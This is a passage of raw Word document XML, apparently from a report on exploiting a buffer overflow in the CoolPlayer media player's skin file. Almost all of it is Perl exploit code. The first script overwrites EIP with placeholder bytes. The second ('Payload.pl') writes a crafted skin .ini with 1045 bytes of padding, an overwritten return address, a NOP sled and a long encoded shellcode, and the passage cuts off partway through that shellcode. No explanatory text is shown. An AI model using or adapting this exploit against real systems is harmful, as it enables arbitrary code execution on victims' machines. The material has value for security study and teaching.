    <w:p w14:paraId="05787646" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>PlaylistSkin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>";</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="795E06A9" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">my $junk1 = "\x41" x </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>1045;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="27327A2E" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>my $</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>eip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> = "BBBB</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>";</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="5686090E" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>my $junk2=</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>"!#</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>$ %&amp;'()*+,-./0123456789:;&lt;=&gt;?@ ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>abcdefghijklmnopqrstuvwxyz</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>{|}~";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F164FD3" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>open($FILE,"&gt;$file"</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="46014784" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>print $FILE $</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>start.$</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>junk1.$eip.$junk2;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A216227" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00164B2A">
      <w:pPr>
        <w:pStyle w:val="code"/>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2DBF4BC9" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="87" w:name="_Toc71564024"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Payload.pl</w:t>
      </w:r>
      <w:bookmarkEnd w:id="87"/>
    </w:p>
    <w:p w14:paraId="1ECB1ACA" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:r>
        <w:t>my $file= "Payload.ini</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>";</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="70CF76C5" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:r>
        <w:t>my $start="[</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>CoolPlayer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Skin]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="620C5707" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>PlaylistSkin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>=</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>";</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="0E73A44D" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">my $junk1 = "\x41" x </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>1045;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="0572E203" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:r>
        <w:t>my $</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>eip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = pack('V',0x7C86467B</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>);</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="23553DDF" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:r>
        <w:t>my $</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nop</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = "\x90" x </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>60;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="18335102" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:r>
        <w:t>my $shellcode =</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03B767A9" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:r>
        <w:t>"\x89\xe2\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>xda</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>\xc8\xd9\x72\xf4\x5e\x56\x59\x49\x49\x49\x49</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>" .</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="2E107F22" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:r>
        <w:t>"\x43\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30\x56</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>" .</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="49EA12CB" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:r>
        <w:t>"\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>" .</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="33DFCE9D" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:r>
        <w:t>"\x42\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>" .</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="2C0620D9" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:r>
        <w:t>"\x30\x42\x42\x58\x50\x38\x41\x43\x4a\x4a\x49\x39\x49\x5a</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>" .</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="0226E713" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>"\x4b\x4d\x4b\x39\x49\x52\x54\x31\x34\x4c\x34\x46\x51\x48</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>" .</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="297B66E5" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:r>
        <w:t>"\x52\x48\x32\x34\x37\x36\x51\x58\x49\x45\x34\x4c\x4b\x52</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>" .</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="7E27325C" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:r>
        <w:t>"\x51\x50\x30\x4c\x4b\x32\x56\x34\x4c\x4c\x4b\x43\x46\x35</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>" .</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="40C3FC17" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:r>
        <w:t>"\x4c\x4c\x4b\x51\x56\x43\x38\x4c\x4b\x33\x4e\x37\x50\x4c</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>" .</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="39AAE42F" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:r>
        <w:t>"\x4b\x37\x46\x47\x48\x50\x4f\x55\x48\x54\x35\x4c\x33\x46</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>" .</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="6C00B324" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:r>
        <w:t>"\x39\x33\x31\x58\x51\x4b\x4f\x4d\x31\x33\x50\x4c\x4b\x32</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>" .</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="71E564A3" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:r>
        <w:t>"\x4c\x51\x34\x57\x54\x4c\x4b\x30\x45\x57\x4c\x4c\x4b\x56</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>" .</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="0852A519" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:r>
        <w:t>"\x34\x51\x38\x33\x48\x35\x51\x4b\x5a\x4c\x4b\x50\x4a\x35</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>" .</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="65946880" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:r>
        <w:t>"\x48\x4c\x4b\x31\x4a\x51\x30\x33\x31\x5a\x4b\x4a\x43\x57</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>" .</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="0979EE17" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:r>
        <w:t>"\x44\x37\x39\x4c\x4b\x47\x44\x4c\x4b\x33\x31\x4a\x4e\x50</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>" .</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="25AF97F0" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:r>
        <w:t>"\x31\x4b\x4f\x46\x51\x49\x50\x4b\x4c\x4e\x4c\x4d\x54\x39</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>" .</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="5C6492C6" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:r>
        <w:t>"\x50\x53\x44\x45\x57\x4f\x31\x58\x4f\x34\x4d\x33\x31\x39</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>" .</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="195FA5CD" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:r>
        <w:t>"\x57\x4a\x4b\x5a\x54\x37\x4b\x33\x4c\x57\x54\x37\x58\x32</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>" .</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="05686438" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:r>
        <w:t>"\x55\x4b\x51\x4c\x4b\x30\x5a\x31\x34\x55\x51\x4a\x4b\x55</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>" .</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="10D97B68" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:r>
        <w:t>"\x36\x4c\x4b\x44\x4c\x50\x4b\x4c\x4b\x31\x4a\x35\x4c\x53</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>" .</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="02600E11" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:r>
        <w:t>"\x31\x5a\x4b\x4c\x4b\x54\x44\x4c\x4b\x53\x31\x5a\x48\x4c</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>" .</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="3A084804" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:r>
        <w:t>"\x49\x51\x54\x46\x44\x35\x4c\x33\x51\x49\x53\x4f\x42\x33</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>" .</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="6ABF90E1" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:r>
        <w:t>"\x38\x46\x49\x39\x44\x4c\x49\x4d\x35\x4c\x49\x39\x52\x33</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>" .</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="5225E6E5" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:r>
        <w:t>"\x58\x4c\x4e\x30\x4e\x34\x4e\x4a\x4c\x31\x42\x4d\x38\x4d</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>" .</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="1317D342" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:r>
        <w:t>"\x4f\x4b\x4f\x4b\x4f\x4b\x4f\x4d\x59\x47\x35\x55\x54\x4f</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>" .</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="14104C51" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:r>
        <w:t>"\x4b\x53\x4e\x39\x48\x4a\x42\x53\x43\x4b\x37\x45\x4c\x56</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>" .</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="504C81E3" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:r>
        <w:t>"\x44\x36\x32\x4a\x48\x4c\x4e\x4b\x4f\x4b\x4f\x4b\x4f\x4d</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>" .</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="221FBFBA" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:r>
        <w:t>"\x59\x47\x35\x33\x38\x43\x58\x52\x4c\x32\x4c\x51\x30\x37</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>" .</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="370B0961" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:r>
        <w:t>"\x31\x33\x58\x37\x43\x30\x32\x56\x4e\x53\x54\x43\x58\x32</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>" .</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="3D739AAA" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:r>
        <w:t>"\x55\x53\x43\x33\x55\x54\x32\x50\x30\x49\x4b\x4b\x38\x51</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>" .</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="17015017" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:r>
        <w:t>"\x4c\x37\x54\x44\x4a\x4b\x39\x4d\x36\x36\x36\x4b\x4f\x30</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>" .</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="286A3E26" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:r>
        <w:t>"\x55\x35\x54\x4b\x39\x38\x42\x30\x50\x4f\x4b\x4e\x48\x39</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>" .</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="0EDF0FB3" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:r>
        <w:t>"\x32\x50\x4d\x4f\x4c\x4c\x47\x55\x4c\x36\x44\x50\x52\x4b</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>" .</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="1E69FBFA" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:r>
        <w:t>"\x58\x51\x4f\x4b\x4f\x4b\x4f\x4b\x4f\x42\x48\x32\x4f\x32</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>" .</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="62F47744" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:r>
        <w:t>"\x58\x56\x38\x57\x50\x55\x38\x55\x31\x35\x37\x43\x55\x50</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>" .</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="5790568D" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:r>
        <w:t>"\x42\x32\x48\x30\x4d\x52\x45\x32\x53\x54\x33\x50\x31\x59</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>" .</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="575539CF" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:r>
        <w:t>"\x4b\x4b\x38\x51\x4c\x46\x44\x55\x5a\x4d\x59\x4d\x33\x32</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>" .</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="7B97AB30" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:r>
        <w:t>"\x48\x30\x58\x37\x50\x51\x30\x31\x30\x53\x58\x30\x4d\x31</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>" .</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="048F4D59" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:r>
        <w:t>"\x43\x57\x36\x51\x31\x33\x58\x44\x32\x42\x4f\x52\x4d\x57</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>" .</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="0896FB05" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:r>
        <w:t>"\x50\x53\x58\x32\x4f\x56\x4c\x47\x50\x52\x46\x52\x48\x51</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>" .</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="23289E53" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:r>
        <w:t>"\x58\x35\x35\x32\x4c\x52\x4c\x30\x31\x58\x49\x4d\x58\x50</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>" .</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="684E8FC5" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:r>
        <w:t>"\x4c\x47\x54\x34\x50\x4b\x39\x4b\x51\x30\x31\x49\x42\x51</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>" .</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="28EE6C8F" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:r>
